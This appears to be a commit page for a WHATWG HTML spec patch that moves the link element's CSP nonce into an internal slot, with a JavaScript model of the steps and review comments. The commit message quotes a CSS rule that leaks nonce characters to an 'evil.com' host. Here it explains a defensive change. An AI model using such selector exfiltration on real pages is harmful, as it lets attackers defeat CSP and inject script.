WIP: Hide nonce content attribute values. (#2369)
We've seen some recent attacks on CSP which rely on the ability to
exfiltrate nonce data via various mechanisms that can grab data from
content attributes. CSS selectors are the best example: through clever
use of prefix/postfix text matching selectors, values can be sent out
to an attacker's server for reuse (e.g.
`script[nonce=a] { background: url("https://evil.com/nonce?a");}`).

This patch makes some changes to mitigate this risk by hiding the nonce
value from relevant elements' content attributes:

1.  When parsing an element with a `nonce` attribute, the content
    attribute's value is copied into an internal slot on the element, and
    overwritten with the empty string.

2.  The `nonce` IDL attribute's getter returns the value of the internal
    slot, and its setter updates the internal slot's value.

3.  The internal slot's value is used to populate the cryptographic
    nonce metadata used by Fetch when making requests.

WIP: This patch doesn't actually do the above yet. It only adjusts
the <link> element in the hopes of sparking conversation about how this
feature should actually work. Does it look reasonable? Should we
replicate the steps for each element type that has a nonce, or move it
up the chain to something like Node?
mikewest committed Feb 20, 2017
1 parent c5d4f5c commit 5c8874f
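
The three steps from the commit message, modelled as an added example (not part of the commit or of the specification source). `ModelLink`, `attrSelectorMatches` and the sample nonce are hypothetical names and values; the model is a plain object, not a browser DOM, and shows that an attribute selector stops matching once the value moves into the internal slot.

```javascript
// Constructed model (not a DOM): an element with content attributes plus a
// [[Cryptographic Nonce]] internal slot, following the three steps above.
class ModelLink {
  constructor(attrs) {
    this.attrs = new Map(Object.entries(attrs)); // content attributes
    this.slot = "";                              // [[Cryptographic Nonce]]
  }
  // Step 1: on connection, copy the content attribute into the slot and
  // overwrite the content attribute with the empty string.
  connect() {
    if (!this.attrs.has("nonce")) { this.slot = ""; return; }
    this.slot = this.attrs.get("nonce");
    this.attrs.set("nonce", "");
  }
  // Step 2: the IDL attribute reads and writes the slot only.
  get nonce() { return this.slot; }
  set nonce(v) { this.slot = String(v); }
  // Step 3: the nonce metadata handed to Fetch comes from the slot.
  nonceMetadata() { return this.slot; }
}

// What a CSS attribute selector can observe: content attributes only.
// op is "=" (exact), "^=" (prefix) or "$=" (suffix).
function attrSelectorMatches(el, name, op, value) {
  if (!el.attrs.has(name)) return false;
  const v = el.attrs.get(name);
  if (op === "=") return v === value;
  if (value === "") return false; // CSS: ^= and $= never match an empty value
  if (op === "^=") return v.startsWith(value);
  if (op === "$=") return v.endsWith(value);
  return false;
}

function demo() {
  const NONCE = "r4nd0mEXAMPLE"; // constructed sample value
  const el = new ModelLink({ rel: "stylesheet", nonce: NONCE });
  const before = attrSelectorMatches(el, "nonce", "^=", "r4");
  el.connect();
  const after = attrSelectorMatches(el, "nonce", "^=", "r4");
  return { before, after, idl: el.nonce, fetch: el.nonceMetadata(),
           attr: el.attrs.get("nonce") };
}
console.log(demo());
```
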
Showing 1 changed file with 26 additions and 4 deletions.
30 changes: 26 additions & 4 deletions source
Expand Up @@ -2402,6 +2402,7 @@ a.setAttribute('href', 'https://example.com/'); // change the content attribute
<li><dfn data-x="converted to ASCII lowercase" data-x-href="https://infra.spec.whatwg.org/#ascii-lowercase">ASCII lowercase</dfn></li>
<li><dfn data-x="converted to ASCII uppercase" data-x-href="https://infra.spec.whatwg.org/#ascii-uppercase">ASCII uppercase</dfn></li>
<li><dfn data-x-href="https://infra.spec.whatwg.org/#ascii-case-insensitive">ASCII case-insensitive</dfn></li>
<li><dfn data-x-href="https://infra.spec.whatwg.org/#iteration-break">break</dfn></li>
<li><dfn data-x-href="https://infra.spec.whatwg.org/#strip-newlines">strip newlines</dfn></li>
<li><dfn data-x-href="https://infra.spec.whatwg.org/#strip-leading-and-trailing-ascii-whitespace">strip leading and trailing ASCII whitespace</dfn></li>
<li><dfn data-x-href="https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace">strip and collapse ASCII whitespace</dfn></li>
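Review bot: The `break` entry in this dependency list links to Infra's `#iteration-break`, which is defined for leaving an iteration, yet the only use visible in this patch is inside a three-step list that is not a loop. If that step is reworded to end the algorithm some other way (for example "then abort these steps"), this dependency is not needed and the line can be dropped.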
Expand Down Expand Up @@ -12380,6 +12381,23 @@ interface <dfn>HTMLLinkElement</dfn> : <span>HTMLElement</span> {
to determine whether or not an external resource specified by the link will be loaded and applied
to the document. The value is text. <ref spec="CSP"></p>

<p>Each <code>link</code> element has a <dfn data-export="" data-dfn-for="link"
data-dfn-type="attribute">[[Cryptographic Nonce]]</dfn> internal slot. When a <code>link</code>
element <span>becomes connected</span>, this slot must be <span>immediately</span> set by
executing the following steps on the <var>element</var>:</p>

<ol>
<li>If <var>element</var> has no <code data-x="attr-link-nonce">nonce</code> content attribute,
set <var>element</var>'s <code>[[Cryptographic Nonce]]</code> to the empty string, then
<span>break</span>.</li>

<li>Set <var>element</var>'s <code>[[Cryptographic Nonce]]</code> to the value of
<var>element</var>'s <code data-x="attr-link-nonce">nonce</code> content attribute.</li>

<li>Set <var>element</var>'s <code data-x="attr-link-nonce">nonce</code> content attribute's
value to the empty string.</li>
</ol>

<p>The <dfn data-export="" data-dfn-for="link" data-dfn-type="element-attr"><code
data-x="attr-link-integrity">integrity</code></dfn> attribute represents the <span
data-x="concept-request-integrity-metadata">integrity metadata</span> for requests which this
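Review bot: Step 1 of the new list sets `[[Cryptographic Nonce]]` to the empty string whenever the element has no `nonce` content attribute, which discards a value a script stored through the IDL setter before the element became connected. Consider leaving the slot untouched in that branch and giving the slot an explicit initial value (the empty string) where it is defined. The `<span>break</span>` in the same step is used outside any iteration; "abort these steps" would match what the step means.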
Expand Down Expand Up @@ -12429,8 +12447,8 @@ interface <dfn>HTMLLinkElement</dfn> : <span>HTMLElement</span> {
<span>environment settings object</span>.

<li><p>Set <var>request</var>'s <span data-x="concept-request-nonce-metadata">cryptographic
nonce metadata</span> to the current value of the <code>link</code> element's <code
data-x="attr-link-nonce">nonce</code> content attribute.</p></li>
nonce metadata</span> to the current value of the <code>link</code> element's
<code>[[Cryptographic Nonce]]</code> internal slot.</p></li>

<li><p>Set <var>request</var>'s <span data-x="concept-request-integrity-metadata">integrity
metadata</span> to the current value of the <code>link</code> element's <code
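Review bot: The replacement text refers to the slot as bare `<code>[[Cryptographic Nonce]]</code>`, so it does not cross-link to the `<dfn>` introduced for it earlier in the patch; wrapping it in a `<span>` or giving it a `data-x` that resolves to that definition would keep the reference navigable. The phrase "current value" also depends on the slot always holding a value, and the definition only says when it is set, not what it holds before then.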
Expand Down Expand Up @@ -12688,12 +12706,16 @@ interface <dfn>HTMLLinkElement</dfn> : <span>HTMLElement</span> {
data-x="dom-link-rel">rel</code></dfn>, <dfn><code data-x="dom-link-as">as</code></dfn>,
<dfn><code data-x="dom-link-media">media</code></dfn>, <dfn><code
data-x="dom-link-hreflang">hreflang</code></dfn>, <dfn><code
data-x="dom-link-type">type</code></dfn>, <dfn><code data-x="dom-link-nonce">nonce</code></dfn>,
<dfn><code data-x="dom-link-integrity">integrity</code></dfn>, <dfn><code
data-x="dom-link-type">type</code></dfn>, <dfn><code
data-x="dom-link-integrity">integrity</code></dfn>, <dfn><code
data-x="dom-link-sizes">sizes</code></dfn>, and <dfn><code
data-x="dom-link-scope">scope</code></dfn> each must <span>reflect</span> the respective content
attributes of the same name.</p>

<p>The <dfn><code data-x="dom-link-nonce">nonce</code></dfn> IDL attribute, on getting, returns
the value of the <code>[[Cryptographic Nonce]]</code> internal slot; and, on setting, changes the
value of the <code>[[Cryptographic Nonce]]</code> to the given value.</p>

<p>The <dfn><code data-x="dom-link-crossOrigin">crossOrigin</code></dfn> IDL attribute must
<span>reflect</span> the <code data-x="attr-link-crossorigin">crossorigin</code> content attribute.</p>
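Review bot: With `nonce` removed from the reflecting list and the new paragraph touching only the slot, nothing here covers a `nonce` content attribute that is set or changed after the element is connected: the value would stay readable in the content attribute and the slot would not pick it up. Attribute change steps that copy the new value into `[[Cryptographic Nonce]]` and clear the content attribute would close that gap. The new paragraph also drops the "must" that the neighbouring IDL paragraphs use ("on getting, returns"), so the requirement reads as descriptive rather than normative.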
